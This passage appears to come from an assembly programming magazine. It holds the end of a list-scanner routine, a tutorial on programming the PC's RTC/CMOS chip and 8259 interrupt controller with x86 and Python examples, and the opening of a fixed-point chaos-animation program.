         MOV [BP-8],DI
         JMP SHORT inlop

;
;main loop head
;  ignore any whitespace and skip the optional comma
;
lop:    CALL NEAR PTR scaws
         CMP BYTE PTR [SI],','
         JNZ SHORT ko
         INC SI

;
;main loop entry
;  ignore any whitespace and if a value token is recognised
;  write it to data store and continue loop
;
inlop:  CALL NEAR PTR scaws
ko:     CALL NEAR PTR scanu
         JC SHORT don
         JZ SHORT ko2
;
;  check that the value is in range for the unit size, if not
;  abort here with an error
;
         CMP [BP-4],EAX
         JC SHORT don
         CALL NEAR PTR wracc
         JMP lop

;
;  no value was present so check for a string
;
ko2:    CMP BYTE PTR [SI],022h
         CLC
         JNZ SHORT don
;
;  get string into data store
;
         INC SI
         XOR EAX,EAX

lop1:   MOV AL,[SI]
;
;  unterminated string causes an error abort, LODSB is not used for the
;load in order to ensure that [SI] will point to the invalid character
;
         CMP AL,1
         JC SHORT don
         INC SI
         CMP AL,022h
         JZ lop
         CALL NEAR PTR wracc
         JMP lop1

;
;  exit point for 'wracc' routine below, clean-up the stack
;
err0:   POP EAX

;
;  main exit point. the carry flag is preserved as this is used
;  for both error and normal exits. the number of bytes stored
;  is calculated into CX, the INC/DEC ensuring ZF=1 if this was zero
;
don:    LAHF
         MOV CX,DI
         SUB CX,[BP-8]
         SAHF
         INC CX
         DEC CX
;
;  restore the only corrupted register and 'LEAVE'
;
         POP EAX
         LEAVE
         RET

;
;wracc- write datum in accumulator to data store
;  AL/AX/EAX is written to the data store depending on the unit size.
;  throughout the routine DI is the offset into the data store and
;  CX is the #bytes left in it. these are updated but if there are
;  insufficient bytes remaining in the store we abort with error, taking
;  care to clear the 4 bytes (AX + return address) off the stack first
;
wracc:  PUSH AX
         MOV AX,[BP-6]
         SUB CX,AX
         JC err0
         CMP AL,2
         POP AX
         JZ SHORT ko0
         JNS SHORT ko1
         STOSB
         RET
;
;  note that 066h STOSW = STOSD
;
ko1:    DB 066h
ko0:    STOSW
         RET

scalst  ENDP

========END OF CODE========================================================
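
The size mask set up at the top of 'scalst' is computed without a table
or a branch, which is easy to miss on a first reading. The following
Python lines mimic that arithmetic. The function name size_mask is made
up for illustration, and Python integers stand in for AL, CL and EAX.

```python
def size_mask(unit):
    """Mask of the bits that fit in a unit of 1, 2 or 4 bytes."""
    shift = ((-unit) & 3) << 3       # NEG AL / AND AL,3 / SHL AL,3
    return 0xFFFFFFFF >> shift       # OR EAX,-1 / SHR EAX,CL
```

For unit sizes 1, 2 and 4 the shift count comes out as 24, 16 and 0, so
the mask is 000000FFh, 0000FFFFh or FFFFFFFFh as listed in the stack
frame comment.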



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                                Using the RTC
                                                                by Jan Verhoeven


Here are some routines to use the RTC/CMOS chip for serious timing. It's
an introductory tutorial, so you'll be given more than enough opportunity to
experiment with timing via this method.


About the hardware.
===================
The RTC chip used to be a Motorola MC 146818A chip, but nowadays you
will either find a Dallas 1287 or 1387 style chip, or it is embedded in
the chipset. So much for romance... :o)

I will describe the Dallas DS 1287 since this configuration has been the
most common one for many years now, and the majority of the features are
the same as for the other chips.

The DS 1287 is a clock/RAM with a Lithium battery inside the package.
That's why the package is so big: the battery needs space. While the
system is powered on, the RTC gets its power from the power supply. When
the PC is off, the RTC goes into power-down mode and slowly drains the
Lithium cell. Expected life for the battery is around 10 years.

The DS 1287 has 64 storage locations, 14 of which are clock and control
registers and the remaining 50 are battery-backed general purpose RAM
cells. This is where the CMOS setup of your PC stores its system setup
data.

The programmable clock can issue an interrupt, which can be triggered by
three independent events: time of day, periodic signal or end of clock-
update.

The 14 registers inside the DS 1287 are:

     address         purpose
     -------         ---------------------------------------
        0            current value of seconds
        1            alarm setting for seconds
        2            current value of minutes
        3            alarm setting for minutes
        4            current value of hours
        5            alarm setting for hours
        6            Day of the week [Sunday = 1]
        7            Day of the month
        8            month                   [1..12]
        9            year of this century    [0..99]
       10            Control register A
       11            Control register B
       12            Control register C      [read-only]
       13            Control register D      [read-only]

If you want to know the time of day, or any other date related data,
just select the RTC chip and request the contents of the desired
register.

The alarm registers can be set to generate long-time periodical
interrupts, or for having the chip give a signal when it's time for your
nap. The alarm rate ranges from once per second to once per day.
And since these alarm registers are almost never used, they can also be
used for storing some data for your own software. PTS Partition Manager
for example uses these registers to keep track of where it was, while
reformatting the hard disk. If there is a power-fail, it will just
continue where it left off.

In the PC, the RTC chip is hidden from the programmer. It can only be
accessed in an indirect way. The trick is to first select a register
location and then access that one register as follows:

         mov     al, <register number>
         out     70h, al         ; select <register number>

         in      al, 71h         ; for a READ operation
         out     71h, ah         ; for a WRITE operation

So, we use port 70h for selecting a register or storage location and use
port 71h for doing the actual access to that register. A bit tedious,
but that's how the PC was designed in the first place.
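
The select-then-access scheme can be tried out away from the hardware
with a small stand-in for the chip. The Python sketch below is only a
model: the class FakeRtc and the helpers read_cell and write_cell are
made-up names, and no real port I/O takes place.

```python
class FakeRtc:
    """Stand-in for the RTC/CMOS chip behind ports 70h and 71h."""

    def __init__(self):
        self.cells = bytearray(64)   # 14 registers + 50 bytes of RAM
        self.index = 0

    def outb(self, port, value):
        if port == 0x70:
            # select a location (on a real AT, bit 7 of this port also
            # gates NMI; that is ignored in this model)
            self.index = value & 0x3F
        elif port == 0x71:
            self.cells[self.index] = value & 0xFF

    def inb(self, port):
        if port == 0x71:
            return self.cells[self.index]
        return 0xFF                  # assumption: port 70h is treated as write-only


def read_cell(chip, number):
    chip.outb(0x70, number)          # first select ...
    return chip.inb(0x71)            # ... then read


def write_cell(chip, number, value):
    chip.outb(0x70, number)          # first select ...
    chip.outb(0x71, value)           # ... then write
```

The point to take away is that every access costs two port operations
and that the selected location is state kept inside the chip, so an
interrupt handler that also touches the RTC can disturb a selection made
by the main program.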

In "old style" RTC chips the century is maintained in software. It
resides in a RAM cell, offset 32h/50d, so it will not be affected by a
year-rollover from 99 to 00. If you update it with a short piece of code
on January first 2000, your PC will be ready for many, many, moons to
come.


The control registers.
======================
Registers A, B, C and D are the registers that control the working of
the RTC clock. They have various functions and register D uses just a
single bit, which is also read-only....
But this chip is well engineered and all registers have a significant
(although not always logical) influence on the operation of it.


Register A: Timing control.
---------------------------
Register A is laid out as follows:

     bit     function
     ---     ------------------------------------------------------------
      7      UIP bit: Update In Progress. When there's a ONE in this flag
             the timing registers are being updated and it is not safe to
             read them. Better to wait until this flag is cleared.
             This one bit is read-only!

     4-6     DV0-DV2: these three bits control the on-chip oscillator. Do
             not experiment too much with this setting. There is only ONE
             valid combination for these three bits: 010.

     0-3     RS0 - RS3: These are the four Rate Selector bits. They
             determine how often the IRQ pin is activated. The following
             table shows the meaning of the different values.

             RS3  RS2  RS1  RS0    Frequency [Hz]    Period [ms]
             ---  ---  ---  ---    --------------    -----------
              0    0    0    0           ---             ----
              0    0    0    1           256             3.906
              0    0    1    0           128             7.813
              0    0    1    1          8192             0.122
              0    1    0    0          4096             0.244
              0    1    0    1          2048             0.488
              0    1    1    0          1024             0.977
              0    1    1    1           512             1.953
              1    0    0    0           256             3.906
              1    0    0    1           128             7.813
              1    0    1    0            64            15.625
              1    0    1    1            32            31.25
              1    1    0    0            16            62.5
              1    1    0    1             8           125.0
              1    1    1    0             4           250.0
              1    1    1    1             2           500.0

            The default value in the average IBM PC is 0110 or 1024 Hz.
            Since no IRQ is enabled, you will not notice any difference
            if you change the value.
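
The rate table follows a simple pattern: from 0011 upward each step
halves the frequency, starting at 8192 Hz, and only 0001 and 0010 fall
outside that pattern. A Python sketch of the table, with function names
that are made up for illustration:

```python
def periodic_rate_hz(rs):
    """Frequency in Hz for a rate selector value 0..15 (None for 0000)."""
    if not 0 <= rs <= 15:
        raise ValueError("rate selector is a 4-bit value")
    if rs == 0:
        return None                  # no periodic signal
    if rs in (1, 2):
        return 256 >> (rs - 1)       # the two special cases: 256 and 128 Hz
    return 32768 >> (rs - 1)         # 8192 Hz at 0011, halving each step


def periodic_period_ms(rs):
    """Period in milliseconds, or None when the rate is switched off."""
    hz = periodic_rate_hz(rs)
    return None if hz is None else 1000.0 / hz
```

With the PC default of 0110 this gives 1024 Hz, or a period of a little
under one millisecond.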


Register B: Internal operation control.
---------------------------------------
This is the most important register for controlling operation of the RTC
chip. Register A determines timing and oscillator parameters, but the B-
register determines how the system will notice these conditions.
In a normal PC, only bit 1 (24/12) is set. All other bits are cleared.

     bit     function
     ---     ------------------------------------------------------------
      7      SET : If you write a ONE in this bit position, the clock
             registers will not be updated anymore. Only when this bit is
             ZERO will the clock registers be updated.

      6      PIE : The Periodic Interrupt Enable bit controls the IRQ
             pin. If this bit is ZERO, no IRQ will be given when the
             programmable frequency source (selected by RS0 - RS3) times
             out.
             You need to set this bit to a ONE to enable a periodic IRQ
             operation.

      5      AIE : Alarm Interrupt Enable. When this bit is ONE, the IRQ
             pin is activated when the alarm-time equals the actual time.

      4      UIE : "Update Ended" Interrupt Enable. When this bit is set
             to ONE, the IRQ line is asserted when the timing registers
             have changed contents.

      3      SQWE : Put a ONE in this bit to have the programmable
             interval timer (which is controlled by RS0 - RS3) output a
             square wave on pin 23 of the chip.
             Unfortunately this pin 23 is not connected in a PC so for us
             this bit has no meaning. But if you are man enough to bring
             pin 23 of the DS 1287 to the outside world, you can use it
             at will.

      2      DM : Data Mode. The timing registers can display their data
             in two different modes: binary and BCD. In the PC, this bit
             is always ZERO, meaning that BCD is the desired format.

      1      24/12 : Controls if hours are shown in 12 or 24 hours mode.
             Put a ONE in here and you have 24 hours in a day. Clear this
             bit and you end up with two half days of 12 hours each. In
             the 12-hour mode, bit 7 of the hours value acts as an AM or
             PM flag.

      0      DSE : Daylight Saving Enabled. Always leave this bit cleared
             to ZERO. Daylight saving time periods vary worldwide and the
             dates of change are determined by politicians and not by
             chipmakers. Unfortunately.
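
The DM and 24/12 bits decide how a raw byte from the hours register has
to be interpreted. The Python sketch below shows one way to turn it into
an hour from 0 to 23. The function names are made up for illustration,
and it is assumed that in 12-hour mode the chip counts 1..12 with bit 7
set for PM.

```python
def bcd_to_int(value):
    """Two BCD digits in one byte to a plain integer."""
    return (value >> 4) * 10 + (value & 0x0F)


def decode_hours(raw, register_b):
    """Return the hour 0..23 from the raw hours byte and register B."""
    binary_mode = bool(register_b & 0x04)    # DM bit
    mode_24 = bool(register_b & 0x02)        # 24/12 bit
    pm = bool(raw & 0x80)                    # only meaningful in 12-hour mode
    if not mode_24:
        raw &= 0x7F                          # strip the AM/PM flag
    hour = raw if binary_mode else bcd_to_int(raw)
    if not mode_24:
        hour = hour % 12 + (12 if pm else 0) # 12 AM -> 0, 12 PM -> 12
    return hour
```

With the normal PC setting (register B = 02h) the hours byte 23h simply
decodes to 23.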


Register C: Interrupt sources.
------------------------------
Register C is a status-word only. The bits in this register are read-
only and only have meaning AFTER an IRQ was received.
Since there is just one IRQ pin on the RTC chip while the IRQ can have
three different sources, these flags are the only way to know which one
triggered it, unless there was only one source enabled. The bits mean the
following:

     bit     function
     ---     ------------------------------------------------------------
      7      IRQF : If this bit is ONE, one of the actual interrupt
             conditions was enabled and the interrupt condition was met.

      6      PF : Periodic interrupt Flag. If this bit is set, the source
             of this IRQ was the programmable interval timer.

      5      AF : Alarm interrupt Flag. If this bit is set, the alarm
             condition was the same as the actual date/time.

      4      UF : The "Update Ended" interrupt Flag. If this bit is set,
             the IRQ was issued by an update of the timing registers.

Bits 0 - 3 are meaningless and will always be ZERO.


Register D: Battery status.
---------------------------
On the chip, there is a voltage reference that is constantly being
compared to the battery voltage. As long as the battery voltage stays
above the reference voltage, bit 7 reads as a ONE. If the battery voltage
drops below the reference, the battery is considered empty and bit 7 will
be CLEARED.
If bit 7 is a ZERO, the battery has been empty for some period of time
and hence the data in the timing registers and in the RAM locations MAY
have lost their meaning.

Bits 0 - 6 have no meaning in this register and will always return a
ZERO value.


Using the RTC internals.
========================
This, in a nutshell, is what the RTC chip is from the inside. I already
explained some lines above how to access the storage locations and the
timing registers of the DS 1287. This does not mean that everything will
also work the first time.

If you need to change a timing value, you must always first disable
register updates, even if you make sure that the changes you make to the
timing registers will fit well within an RTC timeslot. This means:

      -   access register B and set the SET flag
      -   change the timing registers
      -   access register B and clear the SET flag
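
The three steps above can be sketched in Python as follows. This is a
model only: a bytearray called regs stands in for the chip's register
file (the port I/O is left out), the names are made up for illustration,
and BCD data in 24-hour mode is assumed.

```python
REG_B = 0x0B       # control register B
SET_BIT = 0x80     # bit 7: stop clock updates


def int_to_bcd(value):
    """Plain integer 0..99 to two BCD digits in one byte."""
    return ((value // 10) << 4) | (value % 10)


def set_time(regs, hours, minutes, seconds):
    """Write a new time while the clock updates are frozen."""
    regs[REG_B] |= SET_BIT               # step 1: set the SET flag
    regs[4] = int_to_bcd(hours)          # step 2: change the timing registers
    regs[2] = int_to_bcd(minutes)
    regs[0] = int_to_bcd(seconds)
    regs[REG_B] &= ~SET_BIT & 0xFF       # step 3: clear the SET flag again
```

Note that the other bits of register B are left as they were, so the
24/12 and DM settings survive the operation.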

Remember, there's not much intelligence inside a DS 1287. More recent
chips might do more tricks for the programmer, but the old beasties just
do as they were told.

In order to set the periodic interrupt rate, we use the following code:

   --- Begin ------------------------------------------- SetPIRate -----

   SetPIRate:                    ; Set Periodic Interrupt Rate
          mov   al, 0A           ; ah = rate to set
          out   070, al
          mov   al, ah
          out   071, al          ; and set it in register A
          ret

   ---- End -------------------------------------------- SetPIRate -----

This code is very straightforward. It relies on the fact that (in the
IBM PC) the contents of register A are always the same:

      bit  7      = read-only
      bits 4 - 6  = 010
      bits 0 - 3  = rate selector

So the calling code can supply the value of bits 4 - 7 in AH together
with the rate. This is not good programming, since we should:

      -      read in the contents of Register A
      -      clear bits 0 - 3
      -      OR in the new value
      -      write it back to register A
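
The cleaner read-modify-write sequence listed above boils down to one
line of bit arithmetic. A Python sketch, with a function name that is
made up for illustration and with the reading and writing of the register
left to the caller:

```python
def with_rate(register_a, rate):
    """Return a new register A value with only the rate selector replaced."""
    if not 0 <= rate <= 15:
        raise ValueError("rate selector is a 4-bit value")
    return (register_a & 0xF0) | rate    # keep bits 4 - 7, replace bits 0 - 3
```

Starting from the PC default of 26h, with_rate(0x26, 0x0F) gives 2Fh: the
oscillator bits are untouched and the rate drops to 2 Hz.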


Inside the IBM PC.
==================
The IRQ pin of the RTC is connected to the Intel 8259 PIC (Programmable
Interrupt Controller, although "programmable" is too much honour for
this dumbo). In non-XT machines there are two of them, cascaded. This
means that the second one is connected to what used to be IRQ2. This
gives us a rather stupid PC IRQ priority list:

         IRQ     Priority        IRQ     Priority
         ---     --------        ---     --------
          0         0             8          2
          1         1             9          3
          2        10            10          4
          3        11            11          5
          4        12            12          6
          5        13            13          7
          6        14            14          8
          7        15            15          9

A lower number means a higher priority....

The RTC interrupt line is connected to PC-IRQ8. So it comes in third
place for being serviced. When enabled!

Normally IRQ8 is NOT enabled, so you will first have to settle that with
the PIC, which is far from easy to understand. I use the following code
to enable and disable the IRQ8 processing. Disabling this interrupt is
necessary before your program is unloaded from memory. If you don't do
this, the IRQ service routine vector might point to some random code or
data in the next program loaded (like Command.Com).

   --- Begin ------------------------------------------- EnableIRQ8 ----

   EnableIRQ8:                   ; enable IRQ 8 in 8259
          push  ax
          in    al, 0A1          ; get IRQ mask word
          and   al, not bit 0
          out   0A1, al          ; enable IRQ 8
          pop   ax
          ret

   ---- End -------------------------------------------- EnableIRQ8 ----

Easy, isn't it? It took some nights to figure this out, 'cause the Intel
databooks are not that clear. I was glad to find some NEC databooks
since these shed some more light. In general, for older chips, NEC is a
good choice of databooks. They used to second source 80x86 chips for
Intel and are still known for the innovations they put into their V20
and V30 chips. The V25, a vastly improved 8088, was contaminated by 8
full banks of 14 registers. Luckily Intel did not copy this. What would
a 386 have been with 250 GP registers?

Here's the code for disabling IRQ8:

   --- Begin ------------------------------------------ DisableIRQ8 ----

   DisableIRQ8:                  ; disable IRQ 8 in 8259
          push  ax
          in    al, 0A1          ; get IRQ mask word
          or    al, bit 0
          out   0A1, al          ; disable IRQ 8
          pop   ax
          ret

   ---- End ------------------------------------------- DisableIRQ8 ----
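
Both routines touch a single bit in the mask register of the second PIC.
The same rule works for any IRQ line, as the Python sketch below shows.
The function names are made up for illustration and no port I/O is done;
the functions only compute which port and which bit are involved.

```python
def mask_location(irq):
    """Return (port, bit mask) of the 8259 mask bit for IRQ 0..15."""
    if not 0 <= irq <= 15:
        raise ValueError("IRQ must be 0..15")
    port = 0x21 if irq < 8 else 0xA1     # first or second PIC
    return port, 1 << (irq & 7)


def enable(mask_byte, irq):
    """New mask byte with this IRQ enabled (a ZERO bit means enabled)."""
    return mask_byte & ~mask_location(irq)[1] & 0xFF


def disable(mask_byte, irq):
    """New mask byte with this IRQ disabled (a ONE bit means masked)."""
    return mask_byte | mask_location(irq)[1]
```

For IRQ8 this gives port 0A1h and bit 0, which is what the two routines
above use. Keep in mind that the second PIC reaches the CPU through IRQ2
of the first one, so that line must not be masked either.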

Asserting IRQ8 will make the PC generate an INT 70h. So, we need to have
an INT 70h handler ready:

   --- Begin ------------------------------------------ NewIRQ8 --------

   L0:      mov   [IrqCount], ax           ; and store it
   L1:      mov   al, 020                  ; tell stupid PC that IRQ ends here
            out   020, al                  ; EOI to original PIC
            out   0A0, al                  ; EOI to cascaded PIC
            pop   ds, ax                   ; restore registers
            iret                           ; and get out

   NewIRQ8: push  ax, ds
         cs mov   ds, [DataSeg]            ; restore DS
            mov   al, 0C
            out   070, al
            in    al, 071                  ; clear interrupt flags
            test  [Flags], Running         ; are we running?
            jz    L1                       ; if not, get out
            test  [Flags], FastMode        ; Samplerate over 128 Sps?
            jz    >L2                      ; if not, scram
            or    [Flags], TimeOut         ; else set TimeOut flag
            jmp   L1

   L2:      mov   ax, [IrqCount]           ; medium to slow samplerates
            dec   ax                       ; are we at correct value?
            jnz   L0                       ; ... if not, wait some more
            or    [Flags], TimeOut         ; ... if so, set TimeOut flag,
            mov   ax, [MaxCount]           ; ... reload time constant register
            jmp   L0

   ---- End ------------------------------------------- NewIRQ8 --------

I like to do as little as possible in this kind of routine. In this
case I set a flag and rely on the abilities of the background program
to fork execution based on the state of that flag.

I hate the idea of having an INT routine that actually DOES things, but
which, for some obscure reason, cannot complete before the next INT
comes in. You'll be able to figure out what will happen in most cases.

If this routine sets a flag twice, I don't care too much. OK, I lose a
sample, but the program keeps running and it will still terminate when I
ask it to.

This routine:

   - saves registers on the user-stack
   - restores correct DS
   - reads register C to clear the RTC interrupt flags
   - accesses the Flags variable in memory
   - consults these flags and acts upon them
   - eventually reaches L1 and here an EOI is sent to the PICs
   - pops the stored registers from the userstack
   - returns with an IRET.
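
The flag and counter logic of the handler can be followed more easily in
a small model. The Python sketch below mirrors what NewIRQ8 does between
reading register C and sending the EOI. The class name Sampler and the
bit values of the three flags are assumptions made for illustration; the
original program does not show them.

```python
RUNNING, FAST_MODE, TIME_OUT = 0x01, 0x02, 0x04   # assumed bit values


class Sampler:
    def __init__(self, max_count, flags=RUNNING):
        self.flags = flags
        self.max_count = max_count       # [MaxCount]
        self.irq_count = max_count       # [IrqCount]

    def on_irq8(self):
        """One RTC interrupt."""
        if not self.flags & RUNNING:
            return                       # not running: just get out
        if self.flags & FAST_MODE:
            self.flags |= TIME_OUT       # every interrupt is a sample
            return
        count = self.irq_count - 1
        if count == 0:
            self.flags |= TIME_OUT       # time for the next sample
            count = self.max_count       # reload the time constant
        self.irq_count = count
```

With max_count set to 4, the TimeOut flag comes up on every fourth
interrupt. It is up to the main program to clear the flag after it has
taken its sample.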

The PIC needs an EOI to enable lower priority interrupts. And since
there are two PICs in modern PCs, there also must be two EOIs.

The following routine will enable the new IRQ8 handler:

   --- Begin ----------------------------------- EnableNewIRQ8 ---------

   EnableNewIRQ8:                  ; program the RTC chip to 1 kSps
            push  ax               ; and enable the 8259 PIC, channel 8
            mov   al, 0C
            out   070, al
            in    al, 071          ; check register C first
            mov   ah, 00100110xB
            call  SetPIRate        ; set PI rate to 1 kSps
            mov   al, 0B
            out   070, al
            mov   al, 01000010xB   ; enable the RTC interrupt pin
            out   071, al          ; and store it in RTC register B
            call  EnableIRQ8       ; enable the 8259 PIController
            pop   ax
            ret

   ---- End ------------------------------------ EnableNewIRQ8 ---------
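
The two bit patterns used above can be checked with a small model. This
is only a sketch in Python, assuming the usual MC146818/DS1287 register
layout (rate select in the low nibble of register A, periodic interrupt
enable in bit 6 of register B) and a 32.768 kHz time base. The function
names are made up for this illustration:

```python
# Sketch: decode the RTC register values written by EnableNewIRQ8.
# Assumes the MC146818/DS1287 register layout; names are hypothetical.

def periodic_rate_hz(reg_a):
    """Periodic interrupt rate selected by bits RS3..RS0 of register A."""
    rs = reg_a & 0x0F
    if rs == 0:
        return 0                   # periodic interrupt switched off
    if rs <= 2:
        return 256 >> (rs - 1)     # RS=1 -> 256 Hz, RS=2 -> 128 Hz
    return 32768 >> (rs - 1)       # RS=3 -> 8192 Hz ... RS=15 -> 2 Hz


def periodic_irq_enabled(reg_b):
    """True when the PIE bit (bit 6) of register B is set."""
    return bool(reg_b & 0x40)


print(periodic_rate_hz(0b00100110))      # value passed to SetPIRate
print(periodic_irq_enabled(0b01000010))  # value written to register B
```

With the value 00100110xB the model gives 1024 Hz, which is the "1 kSps"
mentioned in the comments.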

And before going back to the OS of your choice, make sure there will be
no more IRQ8s coming this way:

   --- Begin ----------------------------------- ResetNewIRQ8 ----------

   ResetNewIRQ8:                   ; restore default values in RTC
            push  ax               ; and disable 8259 PIC, channel 8
            mov   al, 0A
            out   070, al          ; select register A
            mov   al, 00100110xB
            out   071, al          ; and set it back to PC default
            mov   al, 0B
            out   070, al
            mov   al, 00000010xB   ; disable interruptions from RTC chip
            out   071, al          ; via register B
            call  DisableIRQ8      ; handle the PIC
            pop   ax
            ret

   ---- End ------------------------------------ ResetNewIRQ8 ----------

In the big program these code fragments are from, I use two timer
interrupts:

   - the RTC timer is used for trigger-timing. When the RTC has set the
     right flag, the main program will sample the ADC and store the
     result in a buffer for later processing.

   - the internal PC clock which generates the 55 ms timing signals is
     used to set another flag. When this is set, the (DMM style) display
     is updated. The bargraph display is updated 18 times per second and
     the digital readout on every 8th tick, a little over twice per
     second.

Therefore I also need a new IRQ0 handler:

   ---------------------------------------------------- NewIRQ0 --------

   L0:      pop   ds                       ; restore register
            jmp   [cs:OldIRQ0]             ; and update DOS clock

   NewIRQ0: push  ds                       ; new timer routine (18,2 Hz)
         cs mov   ds, [DataSeg]            ; restore DS
            test  [Flags], Running
            jz    L0                       ; if not running, eject!
            inc   [Counter]                ; else increment counter,
            or    [Flags], RefrshBar       ;  indicate "bargraph refresh"
            test  [Counter], 07            ; twice per second,
            IF  Z or  [Flags], RefrshDig   ;  indicate "digits update"
            jmp   L0                       ; and get out

   ---------------------------------------------------- NewIRQ0 --------

This new routine does the following:

   - check if the DMM is running,
   - if not, it makes no sense to set any flags,
   -   if running, set the "update bargraph display" flag,
   -   if running, check if it is time to update the digital readout,
   - restore DS register,
   - branch to previous IRQ0 handler.
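
The flag logic of NewIRQ0 can be tried out away from the hardware. The
Python sketch below is only a model: the bit values of the flags, the
8-bit counter and the main loop that clears the flags are assumptions,
not taken from the real program.

```python
# Sketch: model of the NewIRQ0 flag logic. Flag bit values and the
# 8-bit counter width are assumptions made for this illustration.
RUNNING, REFRESH_BAR, REFRESH_DIG = 0x01, 0x02, 0x04


class State:
    def __init__(self, running=True):
        self.flags = RUNNING if running else 0
        self.counter = 0


def new_irq0(state):
    """One timer tick: only set flags, never do the real work here."""
    if not (state.flags & RUNNING):
        return                                  # not running: eject
    state.counter = (state.counter + 1) & 0xFF  # inc [Counter]
    state.flags |= REFRESH_BAR                  # bargraph on every tick
    if (state.counter & 0x07) == 0:             # test [Counter], 07
        state.flags |= REFRESH_DIG              # digits on every 8th tick


def simulate(ticks, running=True):
    """Count how often a background loop would see each flag."""
    state = State(running)
    bar = dig = 0
    for _ in range(ticks):
        new_irq0(state)
        if state.flags & REFRESH_BAR:
            bar += 1
            state.flags &= ~REFRESH_BAR
        if state.flags & REFRESH_DIG:
            dig += 1
            state.flags &= ~REFRESH_DIG
    return bar, dig


print(simulate(182))   # 182 ticks are about 10 seconds at 18.2 Hz
```

Over 182 ticks the bargraph flag is raised 182 times and the digits flag
22 times, so the digital readout refreshes a little over twice per second.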

In the initialisation routine, common to all my programs, I make sure
the right interrupt vectors are stolen:

   --- Begin ------------------------------------------ Init -----------

   init:    call  SetVars          ; init most important variables
            call  PowDown          ; make sure ADC is OFF
            call  ClkLo            ; prepare ADC for power-up
            call  ChkTime          ; measure minimum sample time
            call  MaxSps           ; determine maximum sample speed

            mov   ah, 0F
            int   010              ; determine existing video mode
            mov   [VidMode], al    ; store it
            mov   ax, 012
            int   010              ; set 640 x 480 graphics mode
            push  es
            mov   ax, 0351C        ; get old timervector
            int   021
            mov   w [OldIRQ0], bx
            mov   w [OldIRQ0+2], es
            mov   dx, offset NewIRQ0
            mov   ax, 0251C
            int   021              ; install new TIMER routine
            mov   ax, 03570
            int   021
            mov   w [OldClock], bx
            mov   w [OldClock+2], es
            mov   dx, offset NewIRQ8
            mov   ax, 02570
            int   021              ; install NewIRQ8 routine
            call  EnableNewIRQ8    ; and get it to work
            pop   es
            mov   ax, 0
            int   033              ; init mouse
            ShowMouse              ; this is a macro....

            call  FillScreen
            or    [Flags], RfrshBar + RefrPara + Upd8Digs
            call  ShowDig
            call  BrScale
            call  Update
            ret

   ---- End ------------------------------------------- Init -----------

Not much to explain about this INIT routine I guess.

So, on to the EXIT part of the software. Forget this, and the computer
will hang at random times afterwards....

   --- Begin ------------------------------------------ Exit -----------

   exit:    call  PowDown
            call  ResetNewIRQ8
            push  ds
            lds   dx, [OldIRQ0]
            mov   ax, 0251C
            int   021              ; restore timer vector
            pop   ds
            push  ds
            lds   dx, [OldClock]
            mov   ax, 02570
            int   021              ; restore realtime clock vector
            pop   ds

            mov   ah, 0
            mov   al, [VidMode]
            int   010              ; back to previous screenmode
            mov   ax, 0
            int   033              ; reset mouse and -driver
            mov   ax, 04C00
            int   021              ; and exit to DOS

   ---- End ------------------------------------------- Exit -----------

That's all you need to know to get started. The RTC chip has some other
nice possibilities. It can be programmed to interrupt each second. Or
any other number of seconds. It is a truly versatile chip with many
timing functions directly available to systems level programmers.

It might be a good idea to search the web for a datasheet. A good
starting point will be www.dalsemi.com where PDF files will be available
for all DS 1287 style chips. Or else from ftp.dalsemi.com. The latest
version of this chip that I know of is the DS 17887. This has a Y2K
compliant clock and over 8K of NV (=Non Volatile) RAM.

In the USA Dallas have an Automatic Datasheet FaxBack number:

         972 - 371 4441

Have fun exploiting the RTC chip, but be prepared to hit the reset
button now and then. Also, make a backup of the CMOS battery-backup RAM
onto a floppy disk! You'll have corrupted or erased these data before
you know it and it's always a bit of a shock if the system cannot even
find the C: drive anymore....



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                               Chaos Animation
                                                               by Laura Fairhead


     To assemble this program you are going to require most of the library
routines I have so far presented here. You can consider this an example
of just how easy it is to write software in assembler if you continue
to build and refine a library system. The program probably took me about
half an hour of work and most of that was making myself satisfied with
the niceness of the code:-


;issue #5
INCLUDE NUCONV.ASM


;issue #6
INCLUDE SCANU.ASM

;issue #7
;scalst list scanner
INCLUDE SCAWS.ASM

;random number generator
INCLUDE RAND.ASM

;ASM building blocks
INCLUDE PSTR.ASM
INCLUDE PSTRCR.ASM
INCLUDE PSTRCX.ASM
INCLUDE OUTCR.ASM
INCLUDE STRLEN.ASM
INCLUDE PUTCH.ASM


Overview
~~~~~~~~
     This is a simple but endearing graphical animation miniature that
is based on the iterative function:-

     x' = x*x + y + a

     y' = b - x

     Where a,b are constants, x,y are old coordinates and x',y' are the
new ones. All values are taken to be in [0,1). That is the operations
are all performed modulo 1.

     If you haven't covered this in mathematics yet it is quite simple,
your function mod1 would be:-

     mod1(x) = x - int(x)

     This can all be done nicely within the bounds of 32-bit values,
simply view the binary point as being just before the MSbit.
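
     As an illustration only, here is how that representation behaves
in a short Python sketch. The helper names are invented for the example;
the point is that keeping the low 32 bits of a result is the same thing
as taking it modulo 1.

```python
# Sketch: values in [0,1) held as 32-bit integers with the binary point
# just before the most significant bit. Helper names are hypothetical.
MASK32 = 0xFFFFFFFF


def to_fixed(value):
    """Convert a real number to its 32-bit fraction (mod 1)."""
    return int((value % 1.0) * 2**32) & MASK32


def to_float(fixed):
    """Convert a 32-bit fraction back to a float in [0,1)."""
    return fixed / 2**32


def add_mod1(a, b):
    """Addition modulo 1: the carry out of bit 31 is simply dropped."""
    return (a + b) & MASK32


total = add_mod1(to_fixed(0.75), to_fixed(0.5))
print(hex(total), to_float(total))
```

     Here 0.75 + 0.5 wraps around to 0.25, exactly what mod1() asks for,
and no explicit int() or subtraction is ever needed.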

     We only really have 4 values to keep since x',y' are the next x,y.

kaa     EQU kaera+1
kab     EQU kaa+4
kax     EQU kab+4
kay     EQU kax+4

     The EQU's at the program end are defining offsets for uninitialised
data that lies in the primary code segment. Here we have kaa<->a, kab<->b,
kax<->x, kay<->y

;EAX=x
         MOV EAX,DWORD PTR DS:[kax]
;EBX=b
         MOV EBX,DWORD PTR DS:[kab]
;EBX=b-x =y'
         SUB EBX,EAX
;ECX=y' for later use
         MOV ECX,EBX
;EBX=y, y'->y  (didn't I say XCHG is useful!)
         XCHG EBX,DWORD PTR DS:[kay]
;EBX=y+a
         ADD EBX,DWORD PTR DS:[kaa]
;EDX:EAX=x*x
;high dword is the first 32 b.p's....
         MUL EAX
;EBX=x*x+y+a =x'  (how much of the pattern is due to loss of accuracy here?)
         ADD EBX,EDX
